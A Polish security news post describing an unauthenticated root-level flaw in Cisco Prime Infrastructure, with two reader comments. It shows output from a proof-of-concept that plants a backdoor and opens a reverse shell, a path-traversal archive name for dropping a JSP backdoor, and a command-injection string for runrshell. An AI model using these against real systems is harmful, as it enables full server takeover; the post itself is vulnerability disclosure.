Żądny wiedzy? Wbijaj na Mega Sekurak Hacking Party w maju! -30% z kodem: majearly
Cisco Prime Infrastructure – można dostać uprawnienia root bez uwierzytelnienia
Łata od Cisco tutaj. Krytyczność podatności to aż 9.8/10 w skali CVSS. Ale możliwość uzyskania dostępu na system operacyjny i później łatwa eskalacja uprawnień do roota to jest coś. Działanie dostępnego już exploitu:
$ ./poc.py 192.168.100.123 192.168.100.2:4444
(+) planted backdoor!
(+) starting handler on port 4444
(+) connection from 192.168.100.123
(+) pop thy shell!
python -c 'import pty; pty.spawn("/bin/bash")'
[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
sh-4.1# /usr/bin/id
/usr/bin/id
uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
sh-4.1# exit
Jaka jest istota podatności? Mamy tutaj dwa problemy – pierwszy to możliwość anonimowego uploadu spakowanego do .tar pliku .jsp – ale trzeba wykorzystać dodatkowy trick: nazwa pliku w archiwum musi „wyjść” do odpowiedniego katalogu. Pakujemy więc: ../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp
W skrócie, możemy nasz backdoor w .jsp wypakować do niemal dowolnego katalogu na serwerze (jeśli ktoś chce w pełni prześledzić ten trick, zachęcam do zerknięcia na podatność nr 1 z naszego publicznego raportu z pentestów).
Później już tylko banalna eskalacja uprawnień do roota w poleceniu runrshell: /opt/CSCOlumos/bin/runrshell '” && /bin/sh #’ i voila:
sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root)
–ms
Warto dodać, ze exploit/podatność jest do wykonania/wykorzystania tylko z sieci zarządzania, co znacząco utrudnia jej wykorzystanie. Dobre praktyki i standardy konfiguracji wymagają odseparowania sieci produkcyjnej od sieci zarządzania.
Niekoniecznie. Akurat CPrime histuje w wielu firmach portal sponsora wifi donktorego z definicji jest szeroki dostęp.